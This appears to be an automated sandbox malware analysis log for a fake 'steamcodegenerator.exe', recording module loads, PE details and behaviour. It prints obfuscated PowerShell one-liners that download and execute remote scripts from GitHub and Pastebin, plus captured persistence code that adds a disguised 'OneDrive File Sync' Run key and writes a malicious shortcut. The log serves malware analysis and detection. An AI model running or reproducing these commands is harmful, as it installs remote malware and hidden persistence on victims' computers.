Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: BeginSync.lnk.3.dr | LNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: steamcodegenerator.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: steamcodegenerator.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: steamcodegenerator.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: steamcodegenerator.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: steamcodegenerator.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: steamcodegenerator.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: steamcodegenerator.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: steamcodegenerator.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb&& source: steamcodegenerator.exe, 00000000.00000002.3629938089.0000022AF4E20000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3629977699.0000022AF4E54000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: steamcodegenerator.exe
Source: Binary string: dC:\Programming1\ConsoleApplication2\x64\Release\ConsoleApplication2.pdb source: steamcodegenerator.exe
Source: Binary string: C:\Users\Bill Hillman\source\repos\steamcodegenerator\x64\Release\steamcodegenerator.pdb source: steamcodegenerator.exe, 00000000.00000002.3629938089.0000022AF4E20000.00000004.00001000.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3629977699.0000022AF4E54000.00000002.10000000.00040000.00000000.sdmp
Source: steamcodegenerator.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: steamcodegenerator.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: steamcodegenerator.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: steamcodegenerator.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: steamcodegenerator.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\Desktop\steamcodegenerator.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: steamcodegenerator.exe | Static PE information: section name: _RDATA

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")#New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Driver Diagnosis" -Value "regsvr32.exe /s DriverDiag" -PropertyType String -ForceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Force#$source = "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll"#$destination = "$env:tmp\DriverDiag.dll"#Invoke-WebRequest -Uri $source -OutFile $destinationmkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
